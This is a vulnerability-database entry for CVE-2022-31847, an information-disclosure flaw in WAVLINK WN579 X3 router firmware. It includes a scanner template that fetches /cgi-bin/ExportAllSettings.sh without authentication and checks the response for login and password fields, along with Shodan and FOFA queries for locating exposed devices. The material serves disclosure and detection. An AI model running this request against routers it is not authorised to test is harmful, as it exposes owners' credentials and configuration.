CVE-2022-31847: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure

日期: 2025-08-01 | 影响软件: WAVLINK WN579 X3 | POC: 已公开

漏洞描述

WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2022-31847

info:
  name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure
  author: arafatansari
  severity: high
  description: |
    WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
  reference:
    - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31847
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-31847
    cwe-id: CWE-425
    epss-score: 0.50594
    epss-percentile: 0.97776
    cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wn579x3_firmware
    shodan-query:
      - http.html:"Wavlink"
      - http.html:"wavlink"
    fofa-query: body="wavlink"
  tags: cve,cve2022,wavlink,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Login='
          - 'Password='
          - 'Model='
          - 'AuthMode='
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200b4841617577798329eacfe64916aa7868aed2ca12e848f237d8bf80b4f9912f02207db8772aac96f171d7f9d86c2b2f9166f0f676abfb1ce6b5435fcac548b8eb47:922c64590222798bb761d5b6d8e72950

相关漏洞推荐